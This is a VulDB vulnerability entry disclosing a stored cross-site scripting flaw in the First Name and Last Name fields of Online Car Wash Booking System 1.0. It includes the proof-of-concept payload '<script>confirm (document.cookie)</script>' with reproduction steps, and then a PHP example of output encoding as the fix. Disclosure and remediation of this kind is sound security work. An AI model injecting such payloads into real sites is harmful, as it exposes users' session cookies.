| Title | SourceCodester Online Car Wash Booking System 1.0 Cross Site Scripting |
|---|
| Description | # Exploit Title: Online Car Wash Booking System - Stored XSS
# Exploit Author: darkrai069
# Vendor Name: oretnom23
# Vendor Homepage: https://www.sourcecodester.com/php/15274/online-car-wash-booking-system-phpoop-free-source-code.html
# Software Link: https://www.sourcecodester.com/php/15274/online-car-wash-booking-system-phpoop-free-source-code.html
# Version: v1.0
# Tested on: Windows 10, Apache
Description:-
A Stored Cross-Site Scripting (XSS) vulnerability in Online Car Wash Booking System allows arbitrary JavaScript to be injected in Edit through the "First Name" and "Last Name" fields.
Payload used:-
<script>confirm (document.cookie)</script>
Parameter:-
First Name: <script>confirm (document.cookie)</script>
Last Name: <script>confirm (document.cookie)</script>
Steps to reproduce:-
1. Log in to your admin account.
2. Now go to http://localhost:8080/ocwbs/admin/?page=user/list and add a new user.
3. In the "First Name" and "Last Name" parameters, put the payload:
<script>confirm (document.cookie)</script>
4. As you can see our payload has been executed. |
|---|
| User | Anonymous User |
|---|
| Submission | 2024-05-25 15:19 (2 years ago) |
|---|
| Moderation | 2024-05-25 20:27 (5 hours later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 266303 [oretnom23 Online Car Wash Booking System 1.0 /admin/?page=user/list First Name/Last Name cross-site scripting] |
|---|
| Points | 17 |
|---|
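
The fix for the stored XSS described above is to encode the name fields when they are written into the user list. The following is an added example, not code from Online Car Wash Booking System or its vendor; the column names `firstname`/`lastname`, the helper names and the table markup are assumptions made for illustration.

```php
<?php
// Added example: not the application's own code. Column names and
// helper names are hypothetical.

// Constructed sample row: what the users table would return after the
// payload from the report was saved in both name fields.
$user = [
    'firstname' => '<script>confirm (document.cookie)</script>',
    'lastname'  => '<script>confirm (document.cookie)</script>',
];

// Unsafe pattern: the stored value is concatenated into HTML as-is, so the
// browser parses the <script> element whenever the list page is viewed.
function render_row_unsafe(array $u): string
{
    return '<tr><td>' . $u['firstname'] . ' ' . $u['lastname'] . '</td></tr>';
}

// Hardened pattern: encode at output time for the HTML body/attribute context.
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function render_row_safe(array $u): string
{
    return '<tr><td>' . e($u['firstname']) . ' ' . e($u['lastname']) . '</td></tr>';
}

// Input-side check as defence in depth (it does not replace output encoding):
// letters, combining marks, spaces, apostrophes, hyphens and dots, 1-64 chars.
function is_plausible_name(string $value): bool
{
    return preg_match('/^[\p{L}\p{M} .\'-]{1,64}$/u', $value) === 1;
}

// The payload reads document.cookie; marking the session cookie HttpOnly
// keeps it out of reach of page scripts even if an encoding gap remains.
session_set_cookie_params(['httponly' => true, 'samesite' => 'Lax']);

echo render_row_unsafe($user), PHP_EOL; // raw markup reaches the page
echo render_row_safe($user), PHP_EOL;   // same data, emitted as inert text
var_dump(is_plausible_name($user['firstname']));  // rejected on save
var_dump(is_plausible_name("Anne-Marie O'Neil")); // ordinary name accepted
```

Encoding has to be applied on every page that prints these fields, not only the user list, because the value is stored once and rendered in many places.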